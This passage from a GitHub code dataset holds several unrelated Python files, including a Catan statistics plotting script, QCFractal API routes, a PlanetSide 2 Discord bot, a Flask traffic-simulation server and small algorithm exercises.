(gdf.end_lr)])/len(gdf[gdf.lr])\n else:\n odds_win_lr = None\n odds_end_lr = None\n if len(gdf[gdf.la]):\n odds_win_la = 100*len(gdf[(gdf.la) & (gdf.winner)])/len(gdf[gdf.la])\n odds_end_la = 100*len(gdf[(gdf.la) & (gdf.end_la)])/len(gdf[gdf.la])\n else:\n odds_win_la = None\n odds_end_la = None\n \n \n \n \n row = [g*100, odds_win_lr, odds_win_la, odds_end_lr, odds_end_la, len(gdf[gdf.lr]), len(gdf[gdf.la])]\n data.append(row)\n \n odds_df = pd.DataFrame(data = data, columns = ['per_turn', 'odds_win_lr', 'odds_win_la', \n 'odds_end_lr', 'odds_end_la', 'num_lr', 'num_la'])\n \n\n \n \n #%%\n data = []\n for g, gdf in dddf[dddf.bot == False].groupby('per_turn'):\n if len(gdf[gdf.lr]):\n odds_win_lr = 100* len(gdf[(gdf.lr) & (gdf.winner)])/len(gdf[gdf.lr])\n odds_end_lr = 100*len(gdf[(gdf.lr) & (gdf.end_lr)])/len(gdf[gdf.lr])\n else:\n odds_win_lr = None\n odds_end_lr = None\n if len(gdf[gdf.la]):\n odds_win_la = 100*len(gdf[(gdf.la) & (gdf.winner)])/len(gdf[gdf.la])\n odds_end_la = 100*len(gdf[(gdf.la) & (gdf.end_la)])/len(gdf[gdf.la])\n else:\n odds_win_la = None\n odds_end_la = None\n \n \n \n \n row = [g*100, odds_win_lr, odds_win_la, odds_end_lr, odds_end_la, len(gdf[gdf.lr]), len(gdf[gdf.la])]\n data.append(row)\n \n botless_odds_df = pd.DataFrame(data = data, columns = ['per_turn', 'odds_win_lr', 'odds_win_la', \n 'odds_end_lr', 'odds_end_la', 'num_lr', 'num_la'])\n \n \n #%%\n \n fig, axs = plt.subplots(1,2)\n \n sns.lineplot(ax = axs[0], x = 'per_turn', y = 'odds_end_lr', data = odds_df[odds_df.num_lr > 20])\n sns.lineplot(ax = axs[0], x = 'per_turn', y = 'odds_end_lr', data = botless_odds_df[botless_odds_df.num_lr > 20])\n \n axs[0].set_title('Will You Finish with Longest Road?')\n axs[0].set_ylabel('Odds of Finishing with LR (%)')\n axs[0].set_xlabel('Percent of Game Completed')\n # 
plt.legend(['All Games', 'Human Only Games'])\n \n\n \n sns.lineplot(ax = axs[1], x = 'per_turn', y = 'odds_end_la', data = odds_df[odds_df.num_la > 20])\n sns.lineplot(ax = axs[1], x = 'per_turn', y = 'odds_end_la', data = botless_odds_df[botless_odds_df.num_la > 20])\n \n axs[1].set_title('Will You Finish with Largest Army?')\n axs[1].set_ylabel('Odds of Finishing with La (%)')\n axs[1].set_xlabel('Percent of Game Completed')\n plt.legend(['All Games', 'Human Only Games'])\n \n #%%\n fig, axs = plt.subplots(1,2)\n \n sns.lineplot(ax = axs[0], x = 'per_turn', y = 'odds_win_lr', data = odds_df[odds_df.num_lr > 20])\n sns.lineplot(ax = axs[0], x = 'per_turn', y = 'odds_win_lr', data = botless_odds_df[botless_odds_df.num_lr > 20])\n \n axs[0].set_title('Will You Win with Longest Road?')\n axs[0].set_ylabel('Odds of Winning with LR (%)')\n axs[0].set_xlabel('Percent of Game Completed')\n axs[0].axhline(25, color = 'r')\n\n \n sns.lineplot(ax = axs[1], x = 'per_turn', y = 'odds_win_la', data = odds_df[odds_df.num_la > 20])\n sns.lineplot(ax = axs[1], x = 'per_turn', y = 'odds_win_la', data = botless_odds_df[botless_odds_df.num_la > 20])\n \n axs[1].set_title('Will You Win with Largest Army?')\n axs[1].set_ylabel('Odds of Win with La (%)')\n axs[1].set_xlabel('Percent of Game Completed')\n axs[1].axhline(25, color = 'r')\n plt.legend(['All Games', 'Human Only Games'])\n","repo_name":"zanderman12/catan_breakdown","sub_path":"catan_breakdown/scripts/longest_road_largest_army_value.py","file_name":"longest_road_largest_army_value.py","file_ext":"py","file_size_in_byte":8339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"675957326","text":"from networktest import networktest\nimport sqlite3\nimport time\n\ntableinit = '''\nCREATE TABLE IF NOT EXISTS \"data\" (\n \"id\" integer NOT NULL PRIMARY KEY AUTOINCREMENT,\n \"name\" TEXT,\n \"tag\" TEXT,\n \"type\" TEXT\n);'''\nif __name__ == '__main__':\n sq = sqlite3.connect('./db.sqlite')\n c = sq.cursor()\n c.execute(tableinit)\n sq.close()\n # for i in range(0, 100):\n # try:\n # networktest()\n # except Exception as e:\n # print(e)\n\n ## 定时执行\n while True:\n try:\n networktest()\n # 距离下次爬虫间隔2小时\n time.sleep(60 * 60 * 2)\n except Exception as e:\n print(e)\n","repo_name":"fenyuluoshang/taobao_crawler","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13440389391","text":"from typing import List\n\nfrom flask import current_app, g\n\nfrom qcfractal.flask_app import storage_socket\nfrom qcfractal.flask_app.api_v1.blueprint import api_v1\nfrom qcfractal.flask_app.api_v1.helpers import wrap_route\nfrom qcportal.exceptions import LimitExceededError\nfrom qcportal.reaction import (\n ReactionDatasetSpecification,\n ReactionDatasetNewEntry,\n ReactionAddBody,\n ReactionQueryFilters,\n)\nfrom qcportal.utils import calculate_limit\n\n\n#####################\n# Record\n#####################\n\n\n@api_v1.route(\"/records/reaction/bulkCreate\", methods=[\"POST\"])\n@wrap_route(\"WRITE\")\ndef add_reaction_records_v1(body_data: ReactionAddBody):\n limit = current_app.config[\"QCFRACTAL_CONFIG\"].api_limits.add_records\n if len(body_data.stoichiometries) > limit:\n raise LimitExceededError(f\"Cannot add {len(body_data.stoichiometries)} reaction records - limit is {limit}\")\n\n return storage_socket.records.reaction.add(\n 
stoichiometries=body_data.stoichiometries,\n rxn_spec=body_data.specification,\n tag=body_data.tag,\n priority=body_data.priority,\n owner_user=g.username,\n owner_group=body_data.owner_group,\n find_existing=body_data.find_existing,\n )\n\n\n@api_v1.route(\"/records/reaction//components\", methods=[\"GET\"])\n@wrap_route(\"READ\")\ndef get_reaction_components_v1(record_id: int):\n return storage_socket.records.reaction.get_components(record_id)\n\n\n@api_v1.route(\"/records/reaction/query\", methods=[\"POST\"])\n@wrap_route(\"READ\")\ndef query_reaction_v1(body_data: ReactionQueryFilters):\n max_limit = current_app.config[\"QCFRACTAL_CONFIG\"].api_limits.get_records\n body_data.limit = calculate_limit(max_limit, body_data.limit)\n\n return storage_socket.records.reaction.query(body_data)\n\n\n#####################\n# Dataset\n#####################\n\n\n@api_v1.route(\"/datasets/reaction//specifications\", methods=[\"POST\"])\n@wrap_route(\"WRITE\")\ndef add_reaction_dataset_specifications_v1(dataset_id: int, body_data: List[ReactionDatasetSpecification]):\n return storage_socket.datasets.reaction.add_specifications(dataset_id, body_data)\n\n\n@api_v1.route(\"/datasets/reaction//entries/bulkCreate\", methods=[\"POST\"])\n@wrap_route(\"WRITE\")\ndef add_reaction_dataset_entries_v1(dataset_id: int, body_data: List[ReactionDatasetNewEntry]):\n return storage_socket.datasets.reaction.add_entries(\n dataset_id,\n new_entries=body_data,\n )\n","repo_name":"MolSSI/QCFractal","sub_path":"qcfractal/qcfractal/components/reaction/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"31"} +{"seq_id":"19072568729","text":"# discord.py\nimport discord\nfrom discord.ext import commands\nfrom discord.ui import Button, View\n\n# Other modules\nfrom json import JSONDecodeError\nfrom traceback import format_exception\nfrom datetime import datetime, timedelta\nfrom typing import Literal\nfrom datetime import timezone\nimport logging\nimport logging.handlers\nimport sys\n# Dependency imports\nfrom pytz import timezone as pytz_tz\nfrom datefinder import find_dates\nimport requests\n\n# Custom imports\nfrom database.management.connection import set_connections\nfrom discord_tools.modals import EventModal\nfrom utils.logger import define_log, StreamToLogger, exception_to_log\nfrom utils.ps2 import continent_to_id, name_to_server_ID\nfrom utils.timezones import get_IANA\nfrom utils.exit_handlers import main_exit_handler\nimport config as cfg\n# Discord Tools\nfrom discord_tools.classes import AlertReminder\nfrom discord_tools.data import alert_reminder_dict\nfrom discord_tools.embeds import get_server_panel, get_census_health, get_PS2_character_embed, event_embed\nfrom discord_tools.literals import Timezones\nfrom command_groups.genshin_commands import GenshinDB\nfrom discord_tools.tasks import update_genshin_chars\nfrom discord_tools.data import event_dict\nfrom discord.errors import NotFound\n\nlogging.getLogger('discord.http').setLevel(logging.INFO)\nlog = logging.getLogger('discord')\n\ndescription = \"A multipurpose bot made by ElReyZero\"\nintents = discord.Intents.default()\nintents.message_content = True\nbot = commands.Bot(command_prefix='$',\n description=description, intents=intents)\n\nasync def get_admins() -> list:\n \"\"\"Simple function that retrieves the admin User objects from the discord api.\n\n Returns:\n List: List with the admin user objects\n \"\"\"\n return [await 
bot.fetch_user(admin) for admin in cfg.admin_ids]\n\ndef setup_log():\n console_handler, file_handler, formatter = define_log()\n # Redirect stdout and stderr to log:\n sys.stdout = StreamToLogger(log, logging.INFO)\n sys.stderr = StreamToLogger(log, logging.ERROR)\n log.addHandler(file_handler)\n log.propagate = True\n discord.utils.setup_logging(handler=console_handler, formatter=formatter, level=logging.INFO)\n\n@bot.event\nasync def on_ready():\n \"\"\" Modified function that runs on the 'on_ready' event from the bot, it syncs the commands and starts the bot\n \"\"\"\n await bot.wait_until_ready()\n await bot.tree.sync()\n await bot.tree.sync(guild=discord.Object(id=cfg.MAIN_GUILD))\n await bot.change_presence(activity=discord.Game(name=\"with the API\"))\n cfg.bot_id = bot.user.id\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n if cfg.connections:\n update_genshin_chars.start()\n\n@bot.event\nasync def on_message(message):\n if message.content.startswith(\"https://twitter.com/\"):\n content = message.content.replace(\"https://twitter.com\", \"https://vxtwitter.com\")\n await message.delete()\n await message.channel.send(content)\n\n@bot.tree.error\nasync def on_app_command_error(interaction: discord.Interaction, error: Exception):\n \"\"\"Modified function that runs on the 'on_app_command_error' event, it handles errors from the bot.\n The default behaviour is to send a warning to the user that triggered the command and DM the main admin regarding the exception (if debug is set to True).\n \"\"\"\n # Depending on the type of exception, a different message will be sent\n traceback_message = format_exception(type(error), error, error.__traceback__)\n #exception_to_log(log, traceback_message)\n exception_to_log(log, error)\n try:\n original = error.original\n except AttributeError:\n original = error\n if type(original).__name__ == \"ConnectionError\":\n await interaction.response.send_message(f\"{interaction.user.mention} The PS2 API timed out, please try again!\")\n return\n elif type(original).__name__ == \"403 Forbidden\" or isinstance(original, discord.errors.Forbidden):\n await interaction.response.send_message(f\"{interaction.user.mention} Your DM's are disabled.\\nPlease enable 'Allow direct messages from server members' under the privacy tab of the server or 'Allow direct messages' on your privacy settings and try again.\")\n return\n try:\n await interaction.response.send_message((\"Uhhh something unexpected happened! Please try again or contact Rey if it keeps happening.\\nDetails: *{}*\").format(type(original).__name__))\n except discord.errors.InteractionResponded:\n pass\n # If the DEBUG variable is set, the bot will DM the main admin with the whole traceback. 
It's meant for debug purposes only\n if cfg.DEBUG:\n user = await bot.fetch_user(cfg.MAIN_ADMIN_ID)\n try:\n try:\n traceback_message = \"\".join(format_exception(\n type(error), error, error.__traceback__))\n await user.send(f\"Exception: {traceback_message}\")\n except TypeError:\n etype, value, tb = sys.exc_info()\n traceback_message = \"\".join(format_exception(etype, value, tb))\n await user.send(f\"Exception: {traceback_message}\")\n except discord.errors.HTTPException:\n etype, value, tb = sys.exc_info()\n traceback_message = \"\".join(format_exception(etype, value, tb))\n await user.send(f\"Exception: {traceback_message}\")\n raise error\n raise error\n except discord.errors.HTTPException:\n pass\n\n@commands.dm_only()\n@bot.command(aliases=[\"logs\", \"getLogs\"])\nasync def get_bot_logs(ctx: commands.Context):\n \"\"\"Command that returns the bot log file to the user that requested it.\n \"\"\"\n if ctx.author not in await get_admins():\n await ctx.send(\"You don't have permission to use this command!\")\n return\n try:\n await ctx.send(\"Here you go!\", file=discord.File(cfg.PROJECT_PATH+\"/logs/bot.log\"))\n except FileNotFoundError:\n await ctx.send(\"The log file doesn't exist!\")\n\n@bot.tree.command(name=\"alert_reminder\", description=\"Set up a reminder before an alert ends!\")\nasync def alert_reminder(interaction: discord.Interaction, continent: Literal[\"Indar\", \"Amerish\", \"Hossin\", \"Esamir\", \"Oshur\"], minutes: int = 5, server: Literal[\"Emerald\", \"Connery\", \"Cobalt\", \"Miller\", \"Soltech\", \"Jaeger\", \"Genudine\", \"Ceres\"] = \"Emerald\"):\n \"\"\"Command that sets up a reminder before an alert ends.\n \"\"\"\n # Check if the user had inputs for minutes, it also checks if it's valid\n minutes = 5 if minutes == None else minutes\n if minutes < 1:\n await interaction.response.send_message(f\"{interaction.user.mention} Please enter a valid number of minutes.\", ephemeral=True)\n return\n\n # Since the input has the continent and server names, they must be converted to their respective census id\n cont_id = continent_to_id(continent)\n server_id = name_to_server_ID(server, activeServer=False)\n req = requests.get(f\"https://api.ps2alerts.com/instances/active?world={server_id}&zone={cont_id}\")\n data = req.json()\n if len(data) > 0:\n data = data[0]\n # Formatting and replacing timezones\n startTime = data['timeStarted'][:-6]\n startTime = datetime.strptime(startTime, \"%Y-%m-%dT%H:%M:%S\")\n startTime = startTime.replace(tzinfo=timezone.utc).astimezone(tz=None)\n endTime = startTime + timedelta(minutes=90)\n\n if datetime.now() + timedelta(minutes=minutes) >= endTime.replace(tzinfo=None):\n await interaction.response.send_message(f\"There is less than {minutes} minutes in the alert, you cannot set a reminder for that!\")\n return\n\n # Setting up the alert reminder\n reminder = AlertReminder(continent, minutes, endTime, interaction.user)\n reminder.schedule_reminder(interaction)\n try:\n reminders = alert_reminder_dict[interaction.user.id]\n for reminder in reminders:\n if continent == reminder.continent:\n await interaction.response.send_message(f\"You've already set a reminder for {continent}\", ephemeral=True)\n return\n alert_reminder_dict[interaction.user.id].append(reminder)\n except KeyError:\n alert_reminder_dict[interaction.user.id] = list()\n alert_reminder_dict[interaction.user.id].append(reminder)\n await interaction.response.send_message(f\"{interaction.user.mention} You have successfully set a reminder for {continent}\\nThe alert will end 
\\nReminder set to {minutes} minutes before it ends\")\n else:\n await interaction.response.send_message(f\"{interaction.user.mention} There are no active alerts for {continent}\", ephemeral=True)\n\n@bot.tree.command(name=\"remove_alert_reminder\", description=\"Remove an alert reminder\")\nasync def remove_reminder(interaction: discord.Interaction, continent: Literal[\"Indar\", \"Amerish\", \"Hossin\", \"Esamir\", \"Oshur\"]):\n try:\n reminders = alert_reminder_dict[interaction.user.id]\n for reminder in reminders:\n if reminder.continent == continent:\n reminder.scheduler.cancel(reminder.event)\n reminders.remove(reminder)\n await interaction.response.send_message(f\"Your alert reminder for {continent} has been removed\", ephemeral=True)\n except KeyError:\n await interaction.response.send_message(f\"{interaction.user.mention} You do not have a reminder for {continent}\", ephemeral=True)\n\n@bot.tree.command(name=\"census_health\", description=\"Get the census API health check\")\nasync def census_health(interaction: discord.Interaction):\n try:\n embed = get_census_health()\n except JSONDecodeError:\n await interaction.response.send_message(\"Can't fetch data from Honu (It's most likely down). Please try again later.\")\n return\n refresh = Button(label=\"Refresh\", custom_id=\"refresh_health\",\n style=discord.ButtonStyle.blurple)\n\n async def refresh_callback(interaction: discord.Interaction):\n await interaction.response.defer()\n try:\n embed = get_census_health()\n await interaction.edit_original_response(embed=embed)\n except discord.errors.NotFound:\n pass\n except JSONDecodeError:\n await interaction.followup.send(\"Can't fetch data from Honu (It's most likely down). Please try again later.\")\n return\n refresh.callback = refresh_callback\n view = View(timeout=None)\n view.add_item(refresh)\n await interaction.response.send_message(embed=embed, view=view)\n\n\n@bot.tree.command(name=\"check_personal_reminders\", description=\"Check the alert reminders currently set (only for you)\")\nasync def check_personal_reminders(interaction: discord.Interaction):\n try:\n reminders = alert_reminder_dict[interaction.user.id]\n embed = discord.Embed(\n color=0xff0000, title=f\"Alert Reminders for {str(interaction.user)}\", description=\"Current alert reminders set\")\n for reminder in reminders:\n embed.add_field(name=reminder.continent,\n value=f\"{reminder.minutes} minutes before alert ends\", inline=True)\n await interaction.response.send_message(embed=embed, ephemeral=True)\n except KeyError:\n await interaction.response.send_message(f\"{interaction.user.mention} You do not have any alert reminders set\", ephemeral=True)\n\n@bot.tree.command(name=\"server_panel\", description=\"Check the active alerts and open continents on a server. Default: Emerald\")\nasync def check_server_panel(interaction: discord.Interaction, server: Literal[\"Emerald\", \"Connery\", \"Cobalt\", \"Miller\", \"Soltech\", \"Jaeger\", \"Genudine\", \"Ceres\"] = \"Emerald\"):\n try:\n embed = get_server_panel(server)\n if embed:\n refresh = Button(\n label=\"Refresh\", custom_id=\"refresh_alerts\", style=discord.ButtonStyle.blurple)\n\n async def refresh_callback(interaction):\n await interaction.response.defer()\n try:\n embed = get_server_panel(server)\n await interaction.edit_original_response(embed=embed)\n except discord.errors.NotFound:\n pass\n except JSONDecodeError:\n await interaction.followup.send(\"Can't fetch data from Honu (It's most likely down). 
Please try again later.\")\n return\n refresh.callback = refresh_callback\n view = View(timeout=None)\n view.add_item(refresh)\n await interaction.response.send_message(embed=embed, view=view)\n else:\n await interaction.response.send_message(f\"Can't fetch data from Honu or ps2alerts.com (It's most likely down). Please try again later.\")\n except JSONDecodeError:\n await interaction.followup.send(\"Can't fetch data from Honu (It's most likely down). Please try again later.\")\n return\n\n@bot.tree.command(name=\"send_timestamp\", description=\"Send a timestamp for an event given a time, date and event name\")\nasync def send_timestamp(interaction: discord.Interaction, event_name: str, date: str, time: str, timezone: Timezones):\n await interaction.response.defer()\n try:\n date = find_dates(date)\n for dates in date:\n date = dates\n break\n time = time.split(\":\")\n timestamp = date.replace(hour=int(time[0]), minute=int(time[1]))\n timezone_py = pytz_tz(get_IANA(timezone))\n timestamp = timezone_py.localize(timestamp).astimezone(None)\n embed = discord.Embed(\n color=0x171717, title=f\"{event_name}\", description=f\"{event_name} will happen at\")\n embed.add_field(\n name=\"Date\", value=f\"\", inline=True)\n embed.add_field(\n name=\"Relative\", value=f\"\", inline=True)\n get_timestamps_button = Button(\n label=\"Get Timestamps\", style=discord.ButtonStyle.blurple)\n ephemeral = False\n\n async def discord_time_format_callback(interaction: discord.Interaction):\n nonlocal ephemeral\n get_timestamps_button.disabled = True\n if ephemeral:\n await interaction.response.send_message(f\"Date: \\\\nRelative: \\\", ephemeral=True)\n else:\n await interaction.response.send_message(f\"Date: \\\\nRelative: \\\")\n ephemeral = True\n\n get_timestamps_button.callback = discord_time_format_callback\n view = View(timeout=None)\n view.add_item(get_timestamps_button)\n await interaction.followup.send(embed=embed, view=view)\n except AttributeError:\n await interaction.followup.send(f\"{interaction.user.mention} Invalid date format\", ephemeral=True)\n except (IndexError, ValueError):\n await interaction.followup.send(f\"{interaction.user.mention} Invalid time format, time must be in the format HH:MM (24h)\", ephemeral=True)\n\n@bot.tree.command(name=\"character\", description=\"Get the stats of a character\")\nasync def get_character_stats(interaction: discord.Interaction, character_name: str):\n await interaction.response.defer()\n embed = await get_PS2_character_embed(character_name)\n if embed:\n await interaction.followup.send(embed=embed)\n else:\n await interaction.followup.send(\"Character not found\")\n\n@bot.tree.command(name=\"crear_evento\", description=\"Crea un evento\")\nasync def create_event(interaction: discord.Interaction, zona_horaria: Timezones = \"EST\"):\n await interaction.response.send_modal(EventModal(zona_horaria))\n\n@bot.tree.command(name=\"agregar_jugador\", description=\"Agrega un jugador a un evento\")\nasync def add_player_to_event(interaction: discord.Interaction, id_evento:str, jugador: discord.Member):\n channel = interaction.channel\n try:\n if interaction.user.id != event_dict[id_evento].owner_id:\n await interaction.response.send_message(\"No puedes agregar jugadores ya que no eres dueño del evento\", ephemeral=True)\n return\n message = await channel.fetch_message(event_dict[id_evento].message_id)\n if jugador.mention in event_dict[id_evento].accepted:\n await interaction.response.send_message(f\"{jugador.mention} ya está en el evento\", ephemeral=True)\n 
return\n elif jugador.mention in event_dict[id_evento].reserves:\n event_dict[id_evento].reserves.remove(jugador.mention)\n\n if len(event_dict[id_evento].accepted) == event_dict[id_evento].player_count:\n event_dict[id_evento].reserves.append(jugador.mention)\n else:\n event_dict[id_evento].accepted.append(jugador.mention)\n evento = event_dict[id_evento]\n\n await message.edit(embed=event_embed(id_evento, evento.date, evento.time, evento.timezone, evento.activity, evento.description, evento.player_count, evento.accepted, evento.reserves))\n await interaction.response.send_message(f\"{jugador.mention} fue agregado al evento {id_evento}\", ephemeral=True)\n except KeyError:\n await interaction.response.send_message(f\"{interaction.user.mention} No se encontró el evento {id_evento}\", ephemeral=True)\n return\n except NotFound:\n await interaction.response.send_message(f\"{interaction.user.mention} Solo puedes agregar jugadores en el canal donde se creó el evento\", ephemeral=True)\n return\n\n@bot.tree.command(name=\"remover_jugador\", description=\"Remueve un jugador de un evento\")\nasync def remove_player_from_event(interaction: discord.Interaction, id_evento:str, jugador: discord.Member):\n channel = interaction.channel\n try:\n if interaction.user.id != event_dict[id_evento].owner_id:\n await interaction.response.send_message(\"No puedes remover jugadores ya que no eres dueño del evento\", ephemeral=True)\n return\n message = await channel.fetch_message(event_dict[id_evento].message_id)\n if jugador.mention in event_dict[id_evento].accepted:\n event_dict[id_evento].accepted.remove(jugador.mention)\n elif jugador.mention in event_dict[id_evento].reserves:\n event_dict[id_evento].reserves.remove(jugador.mention)\n else:\n await interaction.response.send_message(f\"{jugador.mention} no está en el evento\", ephemeral=True)\n return\n\n evento = event_dict[id_evento]\n\n await message.edit(embed=event_embed(id_evento, evento.date, evento.time, evento.timezone, evento.activity, evento.description, evento.player_count, evento.accepted, evento.reserves))\n await interaction.response.send_message(f\"{jugador.mention} fue removido del evento {id_evento}\", ephemeral=True)\n except KeyError:\n await interaction.response.send_message(f\"{interaction.user.mention} No se encontró el evento {id_evento}\", ephemeral=True)\n return\n except NotFound:\n await interaction.response.send_message(f\"{interaction.user.mention} Solo puedes remover jugadores en el canal donde se creó el evento\", ephemeral=True)\n return\n\nif __name__ == \"__main__\":\n # Defining the logger\n console_handler = setup_log()\n # Setting up the config\n cfg.get_config()\n cfg.connections = set_connections()\n if cfg.connections:\n main_exit_handler(cfg.connections)\n cfg.connections.connect(\"genshin\")\n\n # Group commands\n bot.tree.add_command(GenshinDB(), guild=discord.Object(id=cfg.MAIN_GUILD))\n bot.run(cfg.DISCORD_TOKEN, log_handler=console_handler)","repo_name":"ElReyZero/ReyBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":19778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16995985577","text":"# menuy.py - function style menu\n# Imports typically listed at top\n# each import enables us to use logic that has been abstracted to other files and folders\nimport matrix, swap, mathy, tree, advy, carlist\n\n##\n# Menu banner\nborder = \"=\" * 25\nbanner = f\"\\n{border}\\nPlease Select An Option\\n{border}\"\n# Main list of 
[Prompts, Actions]\n# Two styles are supported to execute abstracted logic\n# 1. \"filename.py\" will be run by exec(open(\"filename.py\").read())\n# 2. file.function references will be executed as file.function()\nmain_menu = [\n [\"Matrix\", matrix.driver],\n [\"Swap\", swap.driver],\n [\"Tree\", tree.driver],\n [\"Car List\", carlist.driver],\n]\n\n# Submenu list of [Prompt, Action]\n# Works similarly to main_menu\nsub_menu = [\n [\"Factors\", mathy.factors],\n [\"GCD\", mathy.gcd],\n [\"LCM\", mathy.lcm],\n [\"Primes\", mathy.primes],\n]\n\nquiz_sub_menu = [\n [\"At the Beach?\", advy.beach],\n [\"On top of the Mountains?\", advy.mountain],\n [\"Navigating a lake?\", advy.lake]\n]\n\n\ndef menu(banner, options):\n # header for menu\n print(banner)\n # build a dictionary from options\n prompts = {0: [\"Exit\", None]}\n for op in options:\n index = len(prompts)\n prompts[index] = op\n\n # print menu or dictionary\n for key, value in prompts.items():\n print(key, '->', value[0])\n\n # get user choice\n choice = input(\"Type your choice> \")\n\n # validate choice and run\n # execute selection\n # convert to number\n try:\n choice = int(choice)\n if choice == 0:\n # stop\n return\n print(choice)\n try:\n # try as function\n action = prompts.get(choice)[1]\n action()\n except TypeError:\n try: # try as playground style\n exec(open(action).read())\n except FileNotFoundError:\n print(f\"File not found!: {action}\")\n # end function try\n # end prompts try\n except ValueError:\n # not a number error\n print(f\"Not a number: {choice}\")\n except UnboundLocalError:\n # traps all other errors\n print(f\"Invalid choice: {choice}\")\n except TypeError:\n print(f\"Not callable {action}\")\n # end validation try\n\n menu(banner, options) # recursion, start menu over again\n\n\n# def submenu\n# using sub menu list above:\n# sub_menu works similarly to menu()\ndef submenu():\n title = \"Function Submenu\" + banner\n menu(title, sub_menu)\n\n\n# def quiz submenu\n# using sub menu list above:\n# sub_menu works similarly to menu()\ndef quiz_submenu():\n title = \"Function Submenu\" + banner\n menu(title, quiz_sub_menu)\n\n\ndef driver():\n title = \"Function Menu\" + banner\n menu_list = main_menu.copy()\n menu_list.append([\"Math\", submenu])\n menu_list.append([\"quiz\", quiz_submenu])\n menu(title, menu_list)\n\nif __name__ == \"__main__\":\n driver()\n","repo_name":"nighthawkcoders/nighthawk_csp","sub_path":"hacks/menuy.py","file_name":"menuy.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"74825181207","text":"from flask import Flask, request, jsonify\nfrom agent import *\nfrom model import RandomModel\n\n# Size of the board:\nnumber_agents = 1\nrandomModel = None\ncurrentStep = 0\n\napp = Flask(\"Traffic example\")\n\n# @app.route('/', methods=['POST', 'GET'])\n\n@app.route('/init', methods=['POST', 'GET'])\ndef initModel():\n global currentStep, randomModel, number_agents\n\n if request.method == 'POST':\n number_agents = int(request.form.get('NAgents'))\n currentStep = 0\n\n print(request.form)\n print(number_agents)\n randomModel = RandomModel(number_agents)\n\n return jsonify({\"message\":\"Parameters recieved, model initiated.\"})\n\n@app.route('/getAgents', methods=['GET'])\ndef getAgents():\n global randomModel\n\n if request.method == 'GET':\n # agentPositions = [{\"id\": str(a.unique_id), \"x\": x, \"y\": 0.08, \"z\":z} for (a, x, z) in randomModel.grid.coord_iter() if isinstance(a, 
Car)]\n\n agentPositions = []\n\n for (a, x, z) in randomModel.grid.coord_iter():\n for agent in a:\n if isinstance(agent, Car):\n agentPositions.append({\"id\": str(agent.unique_id), \"x\": x, \"y\": 0.08, \"z\":z})\n\n\n\n return jsonify({'positions':agentPositions})\n\n\n@app.route('/update', methods=['GET'])\ndef updateModel():\n global currentStep, randomModel\n if request.method == 'GET':\n randomModel.step()\n currentStep += 1\n return jsonify({'message':f'Model updated to step {currentStep}.', 'currentStep':currentStep})\n\nif __name__=='__main__':\n app.run(host=\"localhost\", port=8585, debug=True)","repo_name":"IvanDLar/TC2008BSisuben","sub_path":"ReactiveAgents/trafficBase/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"363930775","text":"#4.5 Validate BST\r\n\"\"\"\r\nImplement a function to check if a binary tree is a binary search tree.\r\n\"\"\"\r\nfrom math import inf\r\n\r\ndef validateBST(root):\r\n stack = []\r\n lastVal = -inf\r\n\r\n while True:\r\n if root is not None:\r\n stack.append(root)\r\n root = root.left\r\n else:\r\n if stack != []:\r\n root = stack.pop()\r\n if lastVal > root.val: return False\r\n lastVal = root.val\r\n root = root.right\r\n else:\r\n break\r\n \r\n return True\r\n","repo_name":"victorplusc/Algorithms","sub_path":"Cracking the Coding Interview/4.5 Validate BST.py","file_name":"4.5 Validate BST.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"28636548921","text":"\"\"\"\nGiven two strings s1 and s2, write a function to return true if s2 contains the permutation of s1. 
\nIn other words, one of the first string's permutations is the substring of the second string.\n\nExample 1:\nInput: s1 = \"ab\" s2 = \"eidbaooo\"\nOutput: True\nExplanation: s2 contains one permutation of s1 (\"ba\").\n\nExample 2:\nInput:s1= \"ab\" s2 = \"eidboaoo\"\nOutput: False\n\nNote:\n    The input strings only contain lower case letters.\n    The length of both given strings is in range [1, 10,000].\n\"\"\"\n\n#Use hash it's very efficient\n\nclass Solution:\n    def checkInclusion(self, s1: str, s2: str) -> bool:\n        hashp = sum(hash(ch) for ch in s1)\n        hashi = sum(hash(ch) for ch in s2[:len(s1)-1])\n        for (ch_out, ch_in) in zip([\"\"] + list(s2), s2[len(s1)-1:]):\n            hashi += hash(ch_in) - hash(ch_out)\n            if hashi == hashp:\n                return True\n        \n        return False\n        \n","repo_name":"raniyer/Learning-competitive-coding","sub_path":"Permutation_in_String.py","file_name":"Permutation_in_String.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70039419287","text":"# 피보나치 수열\n\n# 앞의 두 개의 숫자를 더해서 뒤의 숫자를 만드는 개념이다.\n\ntable = {0:0, 1:1}\n\ndef fib(n):\n    if n not in table:\n        value = fib(n-1) + fib(n-2)\n        table[n] = value\n    return table[n]\n\n# 예시\nprint(fib(100))\n","repo_name":"LeeEunHak/Python_Study","sub_path":"CHAPTER07_자료구조/fib.py","file_name":"fib.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7400298361","text":"import pandas\r\nimport turtle\r\n\r\nscreen = turtle.Screen()\r\nscreen.title(\"US State Quiz\")\r\nscreen.setup(width=700, height=500)\r\nimage = \"blank_states_img.gif\"\r\nscreen.addshape(image)\r\nturtle.shape(image)\r\n\r\nwriter = turtle.Turtle()\r\nwriter.ht()\r\nwriter.penup()\r\n\r\ndata = 